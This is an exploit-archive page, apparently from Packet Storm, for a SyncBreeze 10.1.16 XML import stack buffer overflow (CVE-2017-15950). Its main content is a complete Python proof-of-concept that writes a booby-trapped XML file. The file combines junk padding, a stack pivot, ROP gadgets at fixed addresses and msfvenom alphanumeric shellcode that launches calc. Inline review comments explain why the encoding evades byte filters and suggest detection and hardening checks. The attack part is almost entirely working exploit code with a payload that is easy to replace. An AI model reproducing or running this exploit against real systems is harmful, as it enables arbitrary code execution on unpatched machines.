
SyncBreeze 10.1.16 Buffer Overflow

🗓️ 29 Mar 2021 00:00:00 · Reported by Rafael Machado · Type: packetstorm
🔗 packetstormsecurity.com👁 307 Views

SyncBreeze 10.1.16 XML Buffer Overflow PoC

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Sync Breeze 10.1.16 Buffer Overflow Vulnerability
1 Nov 201700:00
zdt
0day.today
SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow Exploit
29 Mar 202100:00
zdt
Circl
CVE-2017-15950
14 Nov 202406:08
circl
CNVD
SyncBreeze Enterprise Arbitrary Code Execution Vulnerability
1 Nov 201700:00
cnvd
CVE
CVE-2017-15950
31 Oct 201714:00
cve
Cvelist
CVE-2017-15950
31 Oct 201714:00
cvelist
Exploit DB
SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
29 Mar 202100:00
exploitdb
NVD
CVE-2017-15950
31 Oct 201714:29
nvd
Prion
Buffer overflow
31 Oct 201714:29
prion
`# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow  
# Date: 03/27/2021  
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com  
# Vendor: https://www.syncbreeze.com/  
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html  
# Version: SyncBreeze v10.1.16 x86  
# Tested on: Windows 10 x64 (19042.867)  
# CVE: CVE-2017-15950  
  
Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file.   
  
# -*- coding: utf-8 -*-  
  
import struct  
  
# badchars  
#\x00\x0a\x0d\x20\x27  
#\x81\x82\x83\x84\x85\x86\x87\x88  
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90  
#\x91\x92\x93\x94\x95\x96\x97\x98  
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0  
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8  
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0  
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8  
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0  
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8  
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0  
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8  
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0  
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8  
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0  
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8  
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF  
  
# Proof-of-execution payload: 432 bytes, stored below as 39 chunks of 11 bytes
# plus a final 3-byte chunk.
# Per the generator command recorded on the next lines, this is the stock
# msfvenom windows/exec payload with CMD=calc, so its only effect is to start
# the Windows calculator.
# Every byte of the x86/alpha_mixed output below is an ASCII letter or digit,
# which keeps it clear of the bad characters listed above. BufferRegister=EAX
# means the decoder stub expects EAX to hold the payload's own address when it
# starts running.
# NOTE(review): because this part is plain alphanumeric text, a filter that
# only looks for non-printable bytes in an import file will not flag it; the
# length of the attribute it ends up in is the more reliable signal.
# Shellcode payload size: 432 bytes
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python

shellcode = b""
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"
shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"
shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"
shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"
shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"
shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"
shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"
shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"
shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"
shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"
shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"
shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"
shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"
shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"
shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"
shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"
shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"
shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"
shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"
shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"
shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"
shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"
shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"
shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"
shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"
shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"
shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"
shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"
shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"
shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"
shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"
shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"
shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"
shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"
shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"
shellcode += b"\x30\x41\x41"
  
  
# Layout of the oversized value that is later written into the XML attribute.
# Every struct.pack('<L', ...) call emits one 32-bit little-endian word.
# The variable names are Spanish: "basura" = junk, "fruta" = fruit.
#
# Sizes, in the order they are concatenated below:
#   basura 1560 + pivot 4 + padding 16 + padding2 80 + GAD1 4 + GAD2 4
#   + basura2 224 = 1892 bytes, followed by the 432-byte shellcode,
#   for a total of 2324 bytes.
#
# NOTE(review): all three code addresses (0x6506491c, 0x65235465, 0x6506537C)
# are hard-coded constants, so the file only works where those modules load
# at exactly these addresses; presumably they belong to modules shipped with
# the application that do not opt into ASLR (TODO confirm against the
# installed binaries). CALL EAX into data copied from the file also implies
# the target memory is executable, i.e. DEP is presumably not enforced for
# the process. Both are worth checking when assessing an installation.

# padding to crash buffer
basura = struct.pack('<L', 0x41414141) * 390

# gadgets to move payload pointer into EAX
GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP
GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX

# padding to reach buffer address stored in ebp
basura2 = struct.pack('<L', 0x41414141) * 56

# padding for stack pivot

padding = struct.pack('<L', 0x41414141) * 4
padding2 = struct.pack('<L', 0x41414141) * 20

# stack pivot to reach an area with more space for gadgets on the stack
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret

pivot = struct.pack('<L', 0x6506491c)

# final payload

fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode
  
  
# write payload to xml file
# The output is a minimal document with a single <sync> element whose `name`
# attribute carries the 2324-byte value built above; per the header, this
# attribute is what the application's XML import mishandles (CVE-2017-15950).
# The file is opened in binary mode because raw bytes are written unchanged.
#
# NOTE(review), detection and hardening: the attribute contains the bytes
# 0x06 and 0x1C (from the packed addresses), which are not legal characters in
# XML 1.0, so a conforming parser should reject this file outright. An import
# file whose `name` attribute runs to kilobytes or holds control characters is
# a strong indicator; validating attribute length and XML well-formedness
# before import would stop it.
# NOTE(review): the handle is not managed by a `with` block, so it stays open
# if any write() raises.

payload = open("xplSyncBreeze.xml", "wb")
payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))

payload.write("<sync name='".encode('utf-8'))
payload.write(fruta)
payload.write("'>\n</sync>\n".encode('utf-8'))

payload.close()
  
`
